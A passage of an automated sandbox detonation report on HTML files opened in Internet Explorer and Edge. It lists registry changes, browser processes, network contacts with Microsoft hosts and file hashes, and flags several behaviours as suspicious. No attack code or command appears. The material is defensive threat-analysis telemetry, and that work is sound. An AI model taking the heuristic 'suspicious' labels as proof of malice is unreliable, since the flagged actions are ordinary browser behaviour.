| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0e51e1ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2504 wrote to memory of 2300 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabDF3B.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\TarE145.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Analysis: behavioral20
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240729-en
Max time kernel
133s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008f2ad785859e0c48bc39fdee908bd4c900000000020000000000106600000001000020000000170fe8fad6ab3cc8a19223c139a347fb3d589c0727943e41aa2ce40d68f5339f000000000e8000000002000020000000c76d1044721d79509e6bccfda9be16bb2d13d676f7e803ad9add7694ff67fd6220000000fbc50f55b4bb1ecbc6e1d2146ea615cc482ec4f5df17075113510f83d5f4d1cb400000008446b9037a590a8d156e0815007514c211816ea2c04a845ccc772cfe764c401f4d26005420f27a833cdda8815da9823b6b3f23f13987f7afa7e35310e489649d | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{469F5EF1-F499-11EF-9816-E6BB832D1259} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d013091ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2508 wrote to memory of 1416 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2508 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabBC6E.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\TarBD12.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 844771f82e017e357a7f57a95a4436c3 |
| SHA1 | 3143709c91ab3c580b47e29f7008daaad07a120c |
| SHA256 | b1722b6a31dd41392a55233adeb8715a37faa7cb1087d438aa29d18836a22023 |
| SHA512 | 76f5d716855b6689b7134a03254e51e45bdb89e7f4d3d4c7feb3a9a831511dfe94faa95540dc36dbbad7a0fac3803683c08615bcb4439b8065d62014f2c621e5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c1d0471abc34cd8ec67d8819c9d5e98 |
| SHA1 | b26a6cdaa967d043f85a69f06974c9f7ed4da71a |
| SHA256 | d4225411f14175930cad72048e14b38a87984a6ba6f06db52bbaf2b1bb4a1362 |
| SHA512 | d8c2d765c9eb4bd98e3cfed3d3e49e4be4ab753e04efbf2514928ef9f750387aeef19c8913dd55221e1539612e8a0580909331088bb8d8ba3da8ff3b0282e591 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 851c490ac86d2782d929ef8be2907407 |
| SHA1 | 53de2951d97b673733edcdd6110fee61c7bb4162 |
| SHA256 | 49c5bdd64f79eb3881d16d70c78c56024046205ee8b9881fe1944c77b39f0ba2 |
| SHA512 | dfd9abc5fbffd1d63fc932673b74b7bc69c3e28d5cc587fa9a72560023fd2db558c9aa928158fd3ed0527a48e28c95766b2f3038fa5bf3ec799fdcbf09a6c0e5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 80421b23939e2bf9dd5a78f6dc08fc4f |
| SHA1 | 739488a553fe9c3c7fc6915625dcab5746f31762 |
| SHA256 | 0ad318f3fb209c7aaeb5c3d7fc8c6944353f9eab78a5fc5c2f9415ce320ea4ec |
| SHA512 | 4bd192a72756815edec030a3d6759d0e3619f3bbe2d881f1d41ca848e61d03e732758ffa84251b8f30c2c67c713b535169a0938fe18915727b960d16f7c0b453 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e5540eda9b6908bc97f4b7c6a89904a |
| SHA1 | 97760dadf1151584873fcef670ebabdac0e2ff35 |
| SHA256 | 4e5717e0b7d19ef6c2da10d28302178cfaa4e37aa70f662430be8e69a30e6368 |
| SHA512 | 7d9c07f073837bdd9a12b4f5815043f5b4d46b407301edc53df80073d7033a1bd72c42530576315b196b67de92c0dc5de0f8b2085e7b607de36664b04c02a629 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 59a6bab55f00f57d1a9125ab1ce342e7 |
| SHA1 | c1a9177ca9f272d89d264381600b3bb3048fbecd |
| SHA256 | 536a8ca805679545689b8934ae10f0c1c28eac9a4246ce9d8fb46bd5d57ad2f3 |
| SHA512 | 681b1e35651d87bbf03011a7c3729186f9e1858f92719e0375d9db21e768be3fc9f10b0de1069be0451fc0b2cae100f42880f68326eec495728714956bbdc83e |
Analysis: behavioral21
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
150s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa405a46f8,0x7ffa405a4708,0x7ffa405a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5292 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 9f4a0b24e1ad3a25fc9435eb63195e60 |
| SHA1 | 052b5a37605d7e0e27d8b47bf162a000850196cd |
| SHA256 | 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb |
| SHA512 | 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284 |
\??\pipe\LOCAL\crashpad_1864_BHZSMGQVNFLXIUPY
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4c9b7e612ef21ee665c70534d72524b0 |
| SHA1 | e76e22880ffa7d643933bf09544ceb23573d5add |
| SHA256 | a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e |
| SHA512 | e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7090de84491c5e1e8ec0d01346375245 |
| SHA1 | 01985b812cd94660ead8147ab488bf165996c35c |
| SHA256 | 11c470bb14e6809cae3100ab36b25f5157016cba0e4de184dc40788f6e0f1117 |
| SHA512 | 07a7484a32609db74c59c22c706b4f5f68de98b662a78cb2f7c95cd04ab162ad3ba1fd3da63c1a2697f9d0bb75b8a7aaa2b93da7f0dc7658eda90698d2bcea3f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | abeab67aa0422831e5be2c4cc6babc67 |
| SHA1 | 7b2d7a83d472a24248a15bf846a9abf434e4d0fd |
| SHA256 | b7c0db367f35758b7083f790eea2c43d7a9b895b195ab3d68fc16c9d350152fa |
| SHA512 | fc30f21a3a920bba27ae141d5d595e8829aa70202b333787d3d6bfb3ba26852688c11ce201eac9afb2db3d977a689a6e1d50311a4897177cb75a1808612a6c22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ad300fb8424786dd9032c73a7f0e261e |
| SHA1 | b761618d04225610947344db4a5b8226bb90ec00 |
| SHA256 | aeebe5f7bf4bca51199ef02ed02984155a16e361ee5100430065bcb224ea8969 |
